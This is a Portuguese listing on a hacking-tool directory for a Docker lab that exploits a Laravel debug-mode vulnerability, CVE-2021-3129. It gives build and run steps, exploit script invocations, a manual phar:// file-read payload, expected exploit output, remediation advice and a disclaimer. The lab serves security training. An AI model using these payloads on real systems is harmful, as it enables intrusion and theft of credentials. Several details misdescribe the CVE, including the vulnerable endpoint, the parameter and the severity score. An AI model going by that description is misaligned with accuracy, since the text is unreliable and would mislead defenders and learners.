Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE - Laboratório de exploração completo com exploit em Python, contêiner Docker e guia de análise de segurança.

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-3129: Laboratório de RCE com Modo de Depuração do Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

Laboratório prático para exploração do CVE-2021-3129 – uma vulnerabilidade crítica no Laravel que permite leitura de arquivos não autenticada e possível RCE.

Início Rápido

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

O que é o CVE-2021-3129?

PropriedadeDetalhes
SeveridadeCVSS 7.5 (Alta)
AfetadosLaravel < 8.4.2, < 7.30.4
ImpactoLeitura arbitrária de arquivos, exposição de informações, possível RCE
Autenticação NecessáriaNão
Vetor de AtaqueRede

Como Funciona

  1. Reconhecimento – Identificar Laravel com modo de depuração ativado
  2. Validação – Testar o endpoint /_ide_helper.php
  3. Exploração – Usar o wrapper phar:// para ler arquivos
  4. Impacto – Extrair credenciais, chaves de API, variáveis de ambiente

Pré-requisitos

  • Docker Desktop
  • Python 3.8+
  • 4GB de RAM

Configuração (Passo a Passo)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Construir contêiner
docker build -t cve-2021-3129-lab:latest .

# 3. Executar contêiner
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verificar endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Executar exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Saída Esperada

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILIDADE CONFIRMADA!

DETALHES DA VULNERABILIDADE:
- Modo de depuração ATIVADO (APP_DEBUG=true)
- _ide_helper.php ACESSÍVEL
- Leitura arbitrária de arquivos POSSÍVEL
- Informações sigilosas VAZADAS

Uso do Exploit

root@kitploit:~
# Básico
python3 cve_2021_3129_exploit.py http://localhost:8080

# Timeout personalizado
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Ajuda
python3 cve_2021_3129_exploit.py -h

Teste Manual

root@kitploit:~
# Testar endpoint
curl http://localhost:8080/_ide_helper.php

# Testar com payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Remediação

root@kitploit:~
# 1. Definir APP_DEBUG=false no .env
# 2. Remover _ide_helper.php
# 3. Atualizar o Laravel para versão corrigida (8.4.2+, 7.30.4+)
# 4. Reiniciar a aplicação

Limpeza

root@kitploit:~
# Parar contêiner
docker stop laravel-cve-2021-3129

# Remover contêiner
docker rm laravel-cve-2021-3129

# Remover imagem
docker rmi cve-2021-3129-lab:latest

FAQ

P: Posso testar na internet?
R: Não. Isso é apenas para localhost. Nunca teste em sistemas que não sejam seus.

P: Funcionará em versões corrigidas?
R: Não. Laravel 8.4.2+ e 7.30.4+ estão corrigidos.

P: Posso modificar o exploit?
R: Sim. O código está totalmente comentado para aprendizado.

P: Como capturar o tráfego de rede?
R: Use tcpdump ou Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# Em outro terminal, execute o exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Abra a captura: wireshark capture.pcapng

Aviso Legal

⚠️ Apenas para fins educacionais

✅ Usos Autorizados:

  • Aprendizado educacional
  • Testes de segurança autorizados
  • Pesquisa defensiva

❌ Usos Proibidos:

  • Acesso não autorizado a sistemas
  • Hacking ilegal
  • Danos a sistemas

Use apenas em sistemas próprios ou com autorização explícita para teste.

Recursos

  • CVE-2021-3129
  • Segurança do Laravel
  • Wrappers PHP

Autor

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Localização: Bengaluru, Karnataka, Índia

Licença

Licença MIT - Consulte o arquivo LICENSE

Baixar ferramenta